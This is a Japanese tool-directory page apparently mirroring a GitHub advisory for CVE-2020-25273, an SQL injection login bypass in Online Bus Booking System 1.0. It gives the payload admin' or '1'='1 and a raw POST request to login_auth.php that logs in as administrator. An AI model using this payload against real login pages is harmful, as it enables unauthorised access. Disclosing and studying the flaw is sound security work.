Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-25273 — Online Bus Booking System 1.0には、admin.phpの管理者ログイン画面において、ユーザー名またはパスワードのSQLインジェクションによる認証バイパスが存在します。 | Kitploit
ツール/GitHubGitHub/jonathanrey87/cve-2020-25273
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubjonathanrey87/cve-2020-25273

CVE-2020-25273

Online Bus Booking System 1.0には、admin.phpの管理者ログイン画面において、ユーザー名またはパスワードのSQLインジェクションによる認証バイパスが存在します。

リポジトリを見る
5年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-25273

Online Bus Booking System 1.0 には、admin.php の管理ログイン画面で、ユーザー名またはパスワードのSQLインジェクションによる認証バイパスが存在します。

#ベンダー - SourceCodester

#製品 -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#脆弱性タイプ - 認証バイパス

#影響を受けるコンポーネント - bus_booking/admin.php

#攻撃タイプ - ローカル

#権限昇格 - true

#影響: コード実行 - true

攻撃ベクトル

  1. 管理ログインパネルに移動し、バイパスを試みる

  2. リクエストペイロードで、以下を設定する

    username : admin' or '1'='1

    password : admin' or '1'='1


POST /bus_booking/login_auth.php HTTP/1.1

Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0

username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1


管理ダッシュボードへのログインに成功

ツールをダウンロード